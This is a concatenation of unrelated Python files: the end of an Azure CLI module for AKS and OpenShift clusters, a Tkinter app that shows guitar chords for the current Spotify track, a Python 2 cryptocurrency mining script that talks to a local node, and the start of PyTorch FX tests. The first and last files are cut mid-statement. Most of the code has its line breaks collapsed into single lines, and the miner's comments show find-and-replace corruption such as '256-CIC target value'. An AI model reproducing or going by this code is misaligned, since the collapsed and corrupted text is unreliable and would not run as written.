sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name) def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name): return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name) def _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry_id, detach=False): if detach: if not _delete_role_assignments(cli_ctx, 'acrpull', client_id, scope=registry_id): raise CLIError('Could not delete role assignments for ACR. ' 'Are you an Owner on this subscription?') return if not _add_role_assignment(cli_ctx, 'acrpull', client_id, scope=registry_id): raise CLIError('Could not create a role assignment for ACR. ' 'Are you an Owner on this subscription?') return def _ensure_aks_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): aad_session_key = None # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, make one. if not client_secret: client_secret = _create_client_secret() salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. 
' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # We don't need to add role assignment for this created SPN else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') return { 'client_secret': client_secret, 'service_principal': service_principal, 'aad_session_key': aad_session_key, } def _ensure_osa_aad(cli_ctx, aad_client_app_id=None, aad_client_app_secret=None, aad_tenant_id=None, identifier=None, name=None, create=False, customer_admin_group_id=None): rbac_client = get_graph_rbac_management_client(cli_ctx) if create: # This reply_url is temporary set since Azure need one to create the AAD. app_id_name = 'https://{}'.format(name) if not aad_client_app_secret: aad_client_app_secret = _create_client_secret() # Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6", additional_properties=None, type="Scope") # Read directory permissions on Windows Azure Active Directory API directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04", additional_properties=None, type="Role") required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access], additional_properties=None, resource_app_id="00000002-0000-0000-c000-000000000000") list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')" .format(app_id_name))) if list_aad_filtered: aad_client_app_id = list_aad_filtered[0].app_id # Updating reply_url with the correct FQDN information returned by the RP reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier) update_application(client=rbac_client.applications, object_id=list_aad_filtered[0].object_id, display_name=name, identifier_uris=[app_id_name], reply_urls=[reply_url], homepage=app_id_name, 
password=aad_client_app_secret, required_resource_accesses=[required_osa_aad_access]) logger.info('Updated AAD: %s', aad_client_app_id) else: result, _aad_session_key = create_application(client=rbac_client.applications, display_name=name, identifier_uris=[app_id_name], homepage=app_id_name, password=aad_client_app_secret, required_resource_accesses=[required_osa_aad_access]) aad_client_app_id = result.app_id logger.info('Created an AAD: %s', aad_client_app_id) # Get the TenantID if aad_tenant_id is None: profile = Profile(cli_ctx=cli_ctx) _, _, aad_tenant_id = profile.get_login_credentials() return OpenShiftManagedClusterAADIdentityProvider( client_id=aad_client_app_id, secret=aad_client_app_secret, tenant_id=aad_tenant_id, kind='AADIdentityProvider', customer_admin_group_id=customer_admin_group_id) def _ensure_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, make one. if not client_secret: client_secret = _create_client_secret() salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # add role first before save it if not _add_role_assignment(cli_ctx, 'Contributor', service_principal): logger.warning('Could not create a service principal with the right permissions. 
' 'Are you an Owner on this project?') else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') return { 'client_secret': client_secret, 'service_principal': service_principal, } def _create_client_secret(): # Add a special character to satisfy AAD SP secret requirements special_char = '$' client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char return client_secret def _get_rg_location(ctx, resource_group_name, subscription_id=None): groups = cf_resource_groups(ctx, subscription_id=subscription_id) # Just do the get, we don't need the result, it will error out if the group doesn't exist. rg = groups.get(resource_group_name) return rg.location def _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile): if enable_cluster_autoscaler: if min_count is None or max_count is None: raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled') if int(min_count) > int(max_count): raise CLIError('Value of min-count should be less than or equal to value of max-count') if int(node_count) < int(min_count) or int(node_count) > int(max_count): raise CLIError('node-count is not in the range of min-count and max-count') agent_pool_profile.min_count = int(min_count) agent_pool_profile.max_count = int(max_count) agent_pool_profile.enable_auto_scaling = True else: if min_count is not None or max_count is not None: raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag') def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update): """ Validates the min, max, and node count when performing an update """ if min_count is None or max_count is None: if is_enable_or_update: raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or ' 
'--update-cluster-autoscaler is set.') if min_count is not None and max_count is not None: if int(min_count) > int(max_count): raise CLIError('Value of min-count should be less than or equal to value of max-count.') def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name): """Merge an unencrypted kubeconfig into the file at the specified path, or print it to stdout if the path is "-". """ # Special case for printing to stdout if path == "-": print(kubeconfig) return # ensure that at least an empty ~/.kube/config exists directory = os.path.dirname(path) if directory and not os.path.exists(directory): try: os.makedirs(directory) except OSError as ex: if ex.errno != errno.EEXIST: raise if not os.path.exists(path): with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'): pass # merge the new kubeconfig into the existing one fd, temp_path = tempfile.mkstemp() additional_file = os.fdopen(fd, 'w+t') try: additional_file.write(kubeconfig) additional_file.flush() merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name) except yaml.YAMLError as ex: logger.warning('Failed to merge credentials to kube config file: %s', ex) finally: additional_file.close() os.remove(temp_path) def _remove_nulls(managed_clusters): """ Remove some often-empty fields from a list of ManagedClusters, so the JSON representation doesn't contain distracting null fields. This works around a quirk of the SDK for python behavior. These fields are not sent by the server, but get recreated by the CLI's own "to_dict" serialization. 
""" attrs = ['tags'] ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id'] sp_attrs = ['secret'] for managed_cluster in managed_clusters: for attr in attrs: if getattr(managed_cluster, attr, None) is None: delattr(managed_cluster, attr) if managed_cluster.agent_pool_profiles is not None: for ap_profile in managed_cluster.agent_pool_profiles: for attr in ap_attrs: if getattr(ap_profile, attr, None) is None: delattr(ap_profile, attr) for attr in sp_attrs: if getattr(managed_cluster.service_principal_profile, attr, None) is None: delattr(managed_cluster.service_principal_profile, attr) return managed_clusters def _remove_osa_nulls(managed_clusters): """ Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation doesn't contain distracting null fields. This works around a quirk of the SDK for python behavior. These fields are not sent by the server, but get recreated by the CLI's own "to_dict" serialization. """ attrs = ['tags', 'plan', 'type', 'id'] ap_master_attrs = ['name', 'os_type'] net_attrs = ['peer_vnet_id'] for managed_cluster in managed_clusters: for attr in attrs: if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None: delattr(managed_cluster, attr) for attr in ap_master_attrs: if getattr(managed_cluster.master_pool_profile, attr, None) is None: delattr(managed_cluster.master_pool_profile, attr) for attr in net_attrs: if getattr(managed_cluster.network_profile, attr, None) is None: delattr(managed_cluster.network_profile, attr) return managed_clusters def _validate_aci_location(norm_location): """ Validate the Azure Container Instance location """ aci_locations = [ "australiaeast", "canadacentral", "centralindia", "centralus", "eastasia", "eastus", "eastus2", "eastus2euap", "japaneast", "northcentralus", "northeurope", "southcentralus", "southeastasia", "southindia", "uksouth", "westcentralus", "westus", "westus2", "westeurope" ] if norm_location not in aci_locations: raise CLIError('Azure Container 
Instance is not available at location "{}".'.format(norm_location) + ' The available locations are "{}"'.format(','.join(aci_locations))) def osa_list(cmd, client, resource_group_name=None): if resource_group_name: managed_clusters = client.list_by_resource_group(resource_group_name) else: managed_clusters = client.list() return _remove_osa_nulls(list(managed_clusters)) def _format_workspace_id(workspace_id): workspace_id = workspace_id.strip() if not workspace_id.startswith('/'): workspace_id = '/' + workspace_id if workspace_id.endswith('/'): workspace_id = workspace_id.rstrip('/') return workspace_id def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals location=None, compute_vm_size="Standard_D4s_v3", compute_count=3, aad_client_app_id=None, aad_client_app_secret=None, aad_tenant_id=None, vnet_prefix="10.0.0.0/8", subnet_prefix="10.0.0.0/24", vnet_peer=None, tags=None, no_wait=False, workspace_id=None, customer_admin_group_id=None): logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. 
Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long if location is None: location = _get_rg_location(cmd.cli_ctx, resource_group_name) agent_pool_profiles = [] agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='compute', # Must be 12 chars or less before ACS RP adds to it count=int(compute_count), vm_size=compute_vm_size, os_type="Linux", role=OpenShiftAgentPoolProfileRole.compute, subnet_cidr=subnet_prefix ) agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='infra', # Must be 12 chars or less before ACS RP adds to it count=int(3), vm_size="Standard_D4s_v3", os_type="Linux", role=OpenShiftAgentPoolProfileRole.infra, subnet_cidr=subnet_prefix ) agent_pool_profiles.append(agent_node_pool_profile) agent_pool_profiles.append(agent_infra_pool_profile) agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='master', # Must be 12 chars or less before ACS RP adds to it count=int(3), vm_size="Standard_D4s_v3", os_type="Linux", subnet_cidr=subnet_prefix ) identity_providers = [] create_aad = False # Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now try: client.get(resource_group_name, name) except CloudError: # Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None: create_aad = True osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx, aad_client_app_id=aad_client_app_id, aad_client_app_secret=aad_client_app_secret, aad_tenant_id=aad_tenant_id, identifier=None, name=name, create=create_aad, customer_admin_group_id=customer_admin_group_id) identity_providers.append( OpenShiftManagedClusterIdentityProvider( name='Azure AD', provider=osa_aad_identity ) ) auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers) default_router_profile = OpenShiftRouterProfile(name='default') if vnet_peer 
is not None: from msrestazure.tools import is_valid_resource_id, resource_id if not is_valid_resource_id(vnet_peer): vnet_peer = resource_id( subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name, namespace='Microsoft.Network', type='virtualNetwork', name=vnet_peer ) if workspace_id is not None: workspace_id = _format_workspace_id(workspace_id) monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long else: monitor_profile = None network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer) osamc = OpenShiftManagedCluster( location=location, tags=tags, open_shift_version="v3.11", network_profile=network_profile, auth_profile=auth_profile, agent_pool_profiles=agent_pool_profiles, master_pool_profile=agent_master_pool_profile, router_profiles=[default_router_profile], monitor_profile=monitor_profile) try: # long_running_operation_timeout=300 result = sdk_no_wait(no_wait, client.create_or_update, resource_group_name=resource_group_name, resource_name=name, parameters=osamc) result = LongRunningOperation(cmd.cli_ctx)(result) instance = client.get(resource_group_name, name) _ensure_osa_aad(cmd.cli_ctx, aad_client_app_id=osa_aad_identity.client_id, aad_client_app_secret=osa_aad_identity.secret, aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname, name=name, create=create_aad) except CloudError as ex: if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message: raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long if "No registered resource provider found for location" in ex.message: raise CLIError('Please make sure your subscription is whitelisted to use this service. 
https://aka.ms/openshift/managed') # pylint: disable=line-too-long raise ex def openshift_show(cmd, client, resource_group_name, name): logger.warning('Support for existing ARO 3.11 clusters ends June 2022. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long mc = client.get(resource_group_name, name) return _remove_osa_nulls([mc])[0] def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False): logger.warning('Support for existing ARO 3.11 clusters ends June 2022. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long instance = client.get(resource_group_name, name) # TODO: change this approach when we support multiple agent pools. idx = 0 for i in range(len(instance.agent_pool_profiles)): if instance.agent_pool_profiles[i].name.lower() == "compute": idx = i break instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member # null out the AAD profile and add manually the masterAP name because otherwise validation complains instance.master_pool_profile.name = "master" instance.auth_profile = None return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False): logger.warning('Support for existing ARO 3.11 clusters ends June 2022. 
Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long instance = client.get(resource_group_name, name) workspace_id = _format_workspace_id(workspace_id) monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long instance.monitor_profile = monitor_profile return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance) def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False): logger.warning('Support for existing ARO 3.11 clusters ends June 2022. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long instance = client.get(resource_group_name, name) monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long instance.monitor_profile = monitor_profile return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
# ==== Runner.py ====
import threading
import time
import SpotiAuth
import ChordScraper
from tkinter import *
import codecs


def _render_text(content):
    """Create (or recreate) the scrollable, read-only text area and fill it with *content*.

    Extracted from backend_script so the "now playing" and "nothing playing"
    branches share one rendering path.

    NOTE(review): this runs on a worker thread; tkinter is not thread-safe,
    so widget creation should ideally be marshalled onto the main loop
    (e.g. via root.after) -- kept as direct calls to match the original design.
    """
    txt = Text(root, height=40, width=64, background='#0066CC', foreground='white',
               wrap=WORD, font='Courier')
    scrollb = Scrollbar(root, command=txt.yview)
    txt['yscrollcommand'] = scrollb.set
    txt.grid(row=0, rowspan=3, columnspan=4, sticky='news')
    txt.insert(INSERT, content)
    txt.config(state=DISABLED)
    root.update()


def backend_script():
    """Poll Spotify every 10 seconds and display chords for the current track."""
    displayed_song = "none"  # title of the song whose chords are currently shown
    while True:
        token = SpotiAuth.token_response2
        song, artist, is_playing = SpotiAuth.SpotiAuth.currently_playing(token)
        if is_playing:
            # Only refetch/redraw when the track actually changed.
            if song != displayed_song:
                header = f'{song} - {artist}'
                html_source_text, displayed_song = ChordScraper.ChordScraper.get_chords(song, artist)
                # Persist the chords, then show them on the GUI.
                with open('song_chords.txt', 'w+', encoding='utf-16') as chords_file:
                    chords_file.write(f'\n{header}\n\n{html_source_text}')
                with codecs.open('song_chords.txt', 'r', 'utf-16') as f:
                    _render_text(f.read())
        else:
            # BUG FIX: the original wrote this message to 'song_lyrics.txt' (a
            # file nothing reads; the display path uses 'song_chords.txt') and
            # never rendered it, so the GUI silently kept showing stale chords.
            _render_text('Spotify is currently not playing any tracks.')
            # Force a redraw when playback resumes, even with the same song.
            displayed_song = "none"
        time.sleep(10)


# Thread 1: Establishing and Maintaining Spotify OAuth Connection
token_response = SpotiAuth.SpotiAuth.initializer()
first_start = True
threading.Thread(target=SpotiAuth.SpotiAuth.recursive_reinit,
                 args=[token_response, first_start], daemon=True).start()

# Creating the Window for the GUI
root = Tk()
root.title("Chords Plugin for Spotify")
root.configure(background='#0066CC')
root.minsize(420, 220)
root.maxsize(880, 920)
root.rowconfigure([0, 1, 2], minsize=60, weight=1)
root.columnconfigure([0, 1, 2], minsize=75, weight=1)
root.rowconfigure([3], minsize=60, weight=0)

# BUG FIX: the original chained .grid() onto the constructor, storing None in
# btn_quit; keep the widget reference and place it in a separate call.
btn_quit = Button(root, text="Quit", width=12, bg='#0080FF', fg='white', command=root.destroy)
btn_quit.grid(row=3, column=1, sticky='s', padx=5, pady=5)

# Thread 2: Backend Script
threading.Thread(target=backend_script, daemon=True).start()

# Thread 3 (Main Thread): Start GUI
root.mainloop()
# ==== pyminer.py ====
#!/usr/bin/python # # Copyright (c) 2011 The CICcoin developers # Distributed under the MIT/X11 software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # import time import json import pprint import hashlib import struct import re import base64 import httplib import sys from multiprocessing import Process ERR_SLEEP = 15 MAX_NONCE = 1000000L settings = {} pp = pprint.PrettyPrinter(indent=4) class CICcoinRPC: OBJID = 1 def __init__(self, host, port, username, password): authpair = "%s:%s" % (username, password) self.authhdr = "Basic %s" % (base64.b64encode(authpair)) self.conn = httplib.HTTPConnection(host, port, False, 30) def rpc(self, method, params=None): self.OBJID += 1 obj = { 'version' : '1.1', 'method' : method, 'id' : self.OBJID } if params is None: obj['params'] = [] else: obj['params'] = params self.conn.request('POST', '/', json.dumps(obj), { 'Authorization' : self.authhdr, 'Content-type' : 'application/json' }) resp = self.conn.getresponse() if resp is None: print "JSON-RPC: no response" return None body = resp.read() resp_obj = json.loads(body) if resp_obj is None: print "JSON-RPC: cannot JSON-decode body" return None if 'error' in resp_obj and resp_obj['error'] != None: return resp_obj['error'] if 'result' not in resp_obj: print "JSON-RPC: no result in object" return None return resp_obj['result'] def getblockcount(self): return self.rpc('getblockcount') def getwork(self, data=None): return self.rpc('getwork', data) def uint32(x): return x & 0xffffffffL def bytereverse(x): return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) | (((x) >> 8) & 0x0000ff00) | ((x) >> 24) )) def bufreverse(in_buf): out_words = [] for i in range(0, len(in_buf), 4): word = struct.unpack('@I', in_buf[i:i+4])[0] out_words.append(struct.pack('@I', bytereverse(word))) return ''.join(out_words) def wordreverse(in_buf): out_words = [] for i in range(0, len(in_buf), 4): out_words.append(in_buf[i:i+4]) out_words.reverse() return 
''.join(out_words) class Miner: def __init__(self, id): self.id = id self.max_nonce = MAX_NONCE def work(self, datastr, targetstr): # decode work data hex string to binary static_data = datastr.decode('hex') static_data = bufreverse(static_data) # the first 76b of 80b do not change blk_hdr = static_data[:76] # decode 256-CIC target value targetbin = targetstr.decode('hex') targetbin = targetbin[::-1] # byte-swap and dword-swap targetbin_str = targetbin.encode('hex') target = long(targetbin_str, 16) # pre-hash first 76b of block header static_hash = hashlib.sha256() static_hash.update(blk_hdr) for nonce in xrange(self.max_nonce): # encode 32-CIC nonce value nonce_bin = struct.pack("<I", nonce) # hash final 4b, the nonce value hash1_o = static_hash.copy() hash1_o.update(nonce_bin) hash1 = hash1_o.digest() # sha256 hash of sha256 hash hash_o = hashlib.sha256() hash_o.update(hash1) hash = hash_o.digest() # quick test for winning solution: high 32 CICs zero? if hash[-4:] != '\0\0\0\0': continue # convert binary hash to 256-CIC Python long hash = bufreverse(hash) hash = wordreverse(hash) hash_str = hash.encode('hex') l = long(hash_str, 16) # proof-of-work test: hash < target if l < target: print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,) return (nonce + 1, nonce_bin) else: print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,) # return (nonce + 1, nonce_bin) return (nonce + 1, None) def submit_work(self, rpc, original_data, nonce_bin): nonce_bin = bufreverse(nonce_bin) nonce = nonce_bin.encode('hex') solution = original_data[:152] + nonce + original_data[160:256] param_arr = [ solution ] result = rpc.getwork(param_arr) print time.asctime(), "--> Upstream RPC result:", result def iterate(self, rpc): work = rpc.getwork() if work is None: time.sleep(ERR_SLEEP) return if 'data' not in work or 'target' not in work: time.sleep(ERR_SLEEP) return time_start = time.time() (hashes_done, nonce_bin) = self.work(work['data'], work['target']) time_end = time.time() 
time_diff = time_end - time_start self.max_nonce = long( (hashes_done * settings['scantime']) / time_diff) if self.max_nonce > 0xfffffffaL: self.max_nonce = 0xfffffffaL if settings['hashmeter']: print "HashMeter(%d): %d hashes, %.2f Khash/sec" % ( self.id, hashes_done, (hashes_done / 1000.0) / time_diff) if nonce_bin is not None: self.submit_work(rpc, work['data'], nonce_bin) def loop(self): rpc = CICcoinRPC(settings['host'], settings['port'], settings['rpcuser'], settings['rpcpass']) if rpc is None: return while True: self.iterate(rpc) def miner_thread(id): miner = Miner(id) miner.loop() if __name__ == '__main__': if len(sys.argv) != 2: print "Usage: pyminer.py CONFIG-FILE" sys.exit(1) f = open(sys.argv[1]) for line in f: # skip comment lines m = re.search('^\s*#', line) if m: continue # parse key=value lines m = re.search('^(\w+)\s*=\s*(\S.*)$', line) if m is None: continue settings[m.group(1)] = m.group(2) f.close() if 'host' not in settings: settings['host'] = '127.0.0.1' if 'port' not in settings: settings['port'] = 8332 if 'threads' not in settings: settings['threads'] = 1 if 'hashmeter' not in settings: settings['hashmeter'] = 0 if 'scantime' not in settings: settings['scantime'] = 30L if 'rpcuser' not in settings or 'rpcpass' not in settings: print "Missing username and/or password in cfg file" sys.exit(1) settings['port'] = int(settings['port']) settings['threads'] = int(settings['threads']) settings['hashmeter'] = int(settings['hashmeter']) settings['scantime'] = long(settings['scantime']) thr_list = [] for thr_id in range(settings['threads']): p = Process(target=miner_thread, args=(thr_id,)) p.start() thr_list.append(p) time.sleep(1) # stagger threads print settings['threads'], "mining threads started" print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port']) try: for thr_proc in thr_list: thr_proc.join() except KeyboardInterrupt: pass print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
# ==== test_fx.py ====
import builtins import contextlib import copy import functools import inspect import math import numbers import operator import os import pickle import sys import torch import traceback import typing import types import warnings import unittest from math import sqrt from torch.multiprocessing import Process from torch.testing import FileCheck from torch.testing._internal.common_methods_invocations import op_db from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests import torch.utils._pytree as pytree import torch.fx._pytree as fx_pytree from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH import torch._C._fx from torch.fx.node import Target, Argument from torch.fx.passes import shape_prop from torch.fx.immutable_collections import immutable_dict, immutable_list from torch.fx.experimental.rewriter import RewritingTracer from torch.fx.operator_schemas import get_signature_for_torch_op from copy import deepcopy from collections import namedtuple from torch.fx.proxy import TraceError from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401 from fx.test_dce_pass import TestDCE # noqa: F401 from fx.test_fx_const_fold import TestConstFold # noqa: F401 from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import AnnotationsTest # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import TypeCheckerTest # noqa: F401 from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union from torch.testing._internal.common_utils import ( IS_FBCODE, IS_MACOS, IS_WINDOWS, TEST_WITH_ROCM, find_library_location, run_tests, ) from torch.testing._internal.jit_utils import JitTestCase from fx.named_tup import MyNamedTup try: from torchvision import models as 
torchvision_models
    HAS_TORCHVISION = True
except ImportError:
    HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")

class SimpleTest(torch.nn.Module):
    # Minimal traceable module reused by several tests below.
    def forward(self, x):
        return torch.relu(x + 3.0)

def a_non_torch_leaf(a, b):
    # Plain (non-torch) function traced as a call_function node.
    return a + b

# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
    return int(x)

def fx_int_x2(x: float) -> int:
    return int(x) * 2

# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])

# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
    return a[0] + a[1] + b

wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')

def a_lifted_leaf2(a, b):
    return a[0] + a[1] + b

wrap(a_lifted_leaf2)

# Builtins can be wrapped too (exercised by test_torch_fx_len /
# test_torch_fx_getattr).
wrap('len')

wrap('getattr')

@wrap
def wrapped_via_decorator(a):
    return a + 1

wrap('wrapped_with_submodule')

def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
    return batchnorm1d(x)

# Keep references to the originals so tests can verify that tracing does not
# permanently replace the wrapped globals.
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt

wrap('wrapper_fn')

def wrapper_fn(x):
    # Intentionally calls a nonexistent torch attribute; only ever traced,
    # never executed, by the tests that use it.
    return torch.foo(x)

class Pair(NamedTuple):
    x : torch.Tensor
    y : torch.Tensor

# for testing pytrees
class Foo(object):  # noqa: B209
    def __init__(self, a, b):
        self.a = a
        self.b = b

class TestFX(JitTestCase):
    def setUp(self):
        # Checking for mutable operations while tracing is feature flagged
        # Enable it in testing but not by default
        self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
        torch.fx.proxy.TracerBase.check_mutable_operations = True

        if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
            lib_file_path = find_library_location('libtorchbind_test.so')
            torch.ops.load_library(str(lib_file_path))

    def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None): """Check that an nn.Module's results match the GraphModule version for a given set of args/kwargs. """ kwargs = kwargs if kwargs else {} ref_outs = m(*args, **kwargs) gm = symbolic_trace(m) gm.graph.lint() test_outs = gm(*args, **kwargs) self.assertEqual(ref_outs, test_outs) def test_graph_module(self): class MySub(torch.nn.Module): def __init__(self): super().__init__() self.w = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.w + x class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.lin = torch.nn.Linear(4, 3) self.sub_mod = MySub() self.w = torch.nn.Parameter(torch.rand(3)) def forward(self, A, B, c): t = torch.sigmoid(A) + self.lin(c) return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3)) m = MyModule() gm = symbolic_trace(m) ms = torch.jit.script(gm) class M2(torch.nn.Module): def forward(self, A): m, idx = torch.max(A, 0) return m + 1, idx + 1 m2 = M2() gm2 = symbolic_trace(m2) class T(torch.nn.Module): def forward(self, A, b=4, *args, c=5, **kwargs): x = A + 1 + args[0] + kwargs['3'] return x t = T() symbolic_trace(t) # test for issue described at https://github.com/pytorch/pytorch/issues/63883 class M3(torch.nn.Module): def forward(self, x): return torch.relu(x) m3 = M3() gm3 = symbolic_trace(m3) new_instance = gm3.__new__(type(gm3)) new_instance.__init__(gm3, gm3.graph) x = torch.randn(5, 3) torch.testing.assert_allclose(new_instance(x), torch.relu(x)) def test_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) x, y = torch.rand(1), torch.rand(1) self.assertEqual(torch.sin(x + y), gm(x, y)) def test_args_kwargs(self): class 
T(torch.nn.Module): def forward(self, *args, **kwargs): x = args[0] + kwargs['foo'] return x t = T() self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_args_kwargs_no_self(self): class T(torch.nn.Module): def forward(*args, **kwargs): # noqa: B902 self = args[0] return torch.relu(args[1]) t = T() with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'): self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_fx_shifts(self): class MyModule(torch.nn.Module): def forward(self, x): return x << 3, x >> 3 input = torch.LongTensor(10).random_(0, 1024) m = MyModule() self.checkGraphModule(m, (input,)) def test_dict(self): class MyDictMod(torch.nn.Module): def forward(self, d): return d['3'].relu(), {'4' : d['3'].neg()} input_dict = {'3': torch.rand(3, 4)} m = MyDictMod() self.checkGraphModule(m, (input_dict,)) def test_matmul_tracing(self): const = torch.randn(3) def matmul_f(x): return x @ const mod = symbolic_trace(matmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), matmul_f(inp)) def rmatmul_f(x): return const @ x mod = symbolic_trace(rmatmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), rmatmul_f(inp)) def test_disallow_override(self): # Custom delegate to disallow in-place tensor operations class NoMutableCallTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : 